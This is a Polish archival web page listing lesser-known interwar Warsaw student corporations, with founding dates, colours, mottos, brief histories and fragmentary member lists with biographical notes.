Konfederacja Agronomia powstała przed marcem 1933 r. Skupiała młodzież studiującą w Szkole Głównej Gospodarstwa Wiejskiego. Należała do związku międzykonfederacyjnego - Konfederacji Generalnej Polskiej Młodzieży Akademickiej.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje dwa nazwiska.

Lista członków

 1. Jan Chorąży, członek Sądu Konfederacji Generalnej Polskiej Młodzieży Akademickiej 1933/34
 2. Janusz Piszczatowski, przewodniczący Sądu Konfederacji Generalnej Polskiej Młodzieży Akademickiej 1933/34

XL. Polania

Data powstania: przed 1933 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Polania powstała najprawdopodobniej w pierwszej połowie lat 30-tych. Była korporacją narodowych piłsudczyków. Należała do Bloku Polskich Korporacji Akademickich.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje jedno nazwisko.

Lista członków

 1. Adam Świtalski

XLI. Orlonia

Data powstania: przed 1933 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Orlonia powstała najprawdopodobniej w początkach lat 30-tych. Była korporacją narodowych piłsudczyków. Należała do Bloku Polskich Korporacji Akademickich.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje jedno nazwisko.

Lista członków

 1. Jan Domiński, prezes Bloku Polskich Korporacji Akademickich 1933-34

XLII. Nautitia

Data powstania: przed 1933 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Nautitia powstała najprawdopodobniej w początkach lat 30-tych. Była korporacją narodowych piłsudczyków. Należała do Bloku Polskich Korporacji Akademickich.

XLIII. Ingenia

Data powstania: przed 1933 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Ingenia powstała najprawdopodobniej w początkach lat 30-tych. Była korporacją narodowych piłsudczyków. Należała do Bloku Polskich Korporacji Akademickich.

XLIV. Politeia

Data powstania: przed 1933 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Politeia powstała najprawdopodobniej w początkach lat 30-tych. Była korporacją narodowych piłsudczyków. Należała do Bloku Polskich Korporacji Akademickich.

XLV. Pro Patria

Data powstania: przed 1933 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Pro Patria powstała najprawdopodobniej w początkach lat 30-tych. Była korporacją narodowych piłsudczyków. Należała do Bloku Polskich Korporacji Akademickich.

XLVI. Ancona

Data powstania: przed 1933 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Ancona powstała najprawdopodobniej w początkach lat 30-tych. Była korporacją narodowych piłsudczyków. Należała do Bloku Polskich Korporacji Akademickich.

XLVII. Polska Korporacja Akademicka “Brygadja”

Data powstania: przed 1934 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Brygadja powstała najprawdopodobniej w pierwszej połowie lat 30-tych. Była korporacją narodowych piłsudczyków. Należała do Bloku Polskich Korporacji Akademickich.

Lista członków

 1. Tadeusz Marian Kozłowski, prezes sem. zim. 1933/34

XLVIII. Konfederacja Chrobria

Data powstania: kwiecień 1934 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Konfederacja Chrobria powstała w kwietniu 1934 r. Skupiała młodzież studiującą na Politechnice Warszawskiej. Kuratorem stowarzyszenia był prof. Wiesław Chrzanowski. Chrobria należała do związku międzykonfederacyjnego - Konfederacji Generalnej Polskiej Młodzieży Akademickiej.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje 13 nazwisk.

Lista członków

 1. Jan Fabianowski , członek Sądu sem. let. 1933/34
 2. Jerzy Fabianowski, członek Sądu sem. let. 1933/34
 3. Maciej Gierszewski, sekretarz sem. let. 1933/34, wiceprezes sem. zim. 1934/35
 4. Janusz Koller, prezes sem. let. 1933/34
 5. Maksymilian Liwski, sekretarz sem. zim. 1934/35
 6. Cz. Ołtarzewski, członek Sądu sem. zim. 1934/35
 7. Konstanty Płatkowski, członek Sądu sem. zim. 1934/35
 8. Jacek Staff, przewodniczący Sądu sem. zim. 1934/35
 9. Jan Szauert, przewodniczący Sądu sem. let. 1933/34
 10. Andrzej Szperl, (1915-1992)
 11. Wacław Tokarz, prokurator sem. let. 1933/34, prezes sem. zim. 1934/35
 12. Tadeusz Trzeszkowski, prokurator sem. zim. 1934/35
 13. Stanisław Woycicki, wiceprezes sem. let. 1934/35

Pieczęć odnowionej Lutycji, połowa lat 30-tych.

XLVIX. Lutycja

Data powstania: 1934 r.
Barwy: czerwona – biała – niebieska
Dewiza: „Naprzód pracą. Jeden za wszystkich wszyscy za jednego.”

Rys historyczny

Powstanie korporacji w Warszawie związane jest ze staraniami dra Jana Szukszty odnowienia powstałej w 1884 r. K! Lutycja (vide szerzej K! Lutycja we Lwowie). Z jego inicjatywy w 1934 r. grupa członków warszawskiej K! Grunwaldja powołała Lutycję, która jednak nie rozwinęła działalności i po kilku miesiącach zanikła.

L. Comitia

Data powstania: przed 1934 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Comitia powstała przed 1934 r. W 1932/33 r. przystąpiła do sanacyjnej Federacji Polskich Korporacji Akademickich.

LI. Diligentia

Data powstania: ?
Barwy: ?
Dewiza: ?

LII. Korpus Zawisza Czarny

Data powstania: ?
Barwy: ?
Dewiza: ?

Zawisza Czarny należał do korporacji typu korpusowego (vide W dwudziestoleciu: korporacje 1918-1939).

LIII. Venedia

Data powstania: ?
Barwy: ?
Dewiza: ?

LIV. Czarnomorje

Data powstania: ?
Barwy: ?
Dewiza: ?

Czarnomorje zrzeszało studentów ukraińskich.

LV. Zaporoże

Data powstania: ?
Barwy: ?
Dewiza: ?

Zaporoże zrzeszało studentów ukraińskich.

LVI. Awiwja

Data powstania: ?
Barwy: ?
Dewiza: ?

Awiwja była żeńską korporacją żydowską. Należała do nurtu syjonistycznego.

LVII. Hacofija

Data powstania: ?
Barwy: ?
Dewiza: ?

Awiwja była żeńską korporacją żydowską. Należała do nurtu syjonistycznego.

LVIII. Virtunia

Virtunia (?), Warszawa połowa lat 30-tych (?).

Data powstania: ?
Barwy: ?
Dewiza: ?

Korporacja znana z jednego przekazu ustnego i jednego zdjęcia. Miała skupiać młodzież studiującą w Państwowej Szkole Mechaniczno-Technicznej im. H. Wawelberga i S. Rotwanda.

Całkowita ustalona imienna lista członków liczy trzy nazwiska.

Lista członków

  Stefan Chełmiński, połowa lat 30-tych (?).

 1. Stefan Chełmiński

 2. Zbigniew Litmanowicz

  Witold Modliński, połowa lat 30-tych (?).

 3. Witold Modliński, (20 maja 1910 w Warszawie - 11 sierpnia 1980 w Warszawie) s. Teodora i Marii z d. Lubicz-Zakrzewska, brat Janusza (Hermesia), brat stryjeczny Bronisława Kowalczewskiego (Welecja), absolwent gimnazjum matematyczno-przyrodniczego Bergera w Poznaniu, student i absolwent (inż.) Państwowej Szkoły Mechaniczno-Technicznej im. H. Wawelberga i S. Rotwanda, ukończył szkołę podchorążych rezerwy, po studiach pracował jako konstruktor w fabryce “Parowóz” w Warszawie 1936-37, a następnie w Państwowych Zakładach Inżynierii w Warszawie 1937-39, w w czasie wojny obronnej 1939 w sztabie gen. Bortnowskiego, a następnie walczył w okolicach Iłży, w czasie okupacji konstruktor w Państwowych Zakładach Inżynierii w Ursusie 1940-41, a później jako kierownik warsztatów w Gimnazjum Mechanicznym w Żelechowie 1941-45, por. AK, komendant WiN w okręgu Żelechów, dyrektor Gimnazjum Mechanicznego w Żelechowie 1945-46, starszy inspektor w Dyrekcji Mechanizacji Budownictwa „B.O.R.” w Warszawie 1950-51, główny mechanik w S.P.B. Bazie Sprzętu i Transportu w Warszawie 1951-52, kierownik działu technologii w Biurze Konstrukcyjnym Maszyn Budowlanych w Warszawie 1952-57, starszy inż. w S.P.B. Centrali w Warszawie 1957-60, starszy projektant w Instytucie Organizacji i Mechanizacji Budownictwa w Warszawie 1960-62, starszy inspektor w Przedsiębiorstwie Projektowania i Dostaw Inwestycyjnych w Warszawie 1962-66, kierownik pracowni ZREMB Centrala w Warszawie 1966-75, od lat 60-tych działał w ruchu spółdzielczym, pochowany na warszawskich Powązkach

Listy członków opracowano na podstawie:

1) Biuletynów Warszawskiego Koła Międzykorporacyjnego 1924-1932,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków korporacji.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 21 IX 2010 r.
Ostatnia zmiana: 22 XII 2022 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Mniejsze i mniej znane korporacje akademickie z Warszawy, (na:) www.archiwumkorporacyjne.pl, stan 22 XII 2021 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }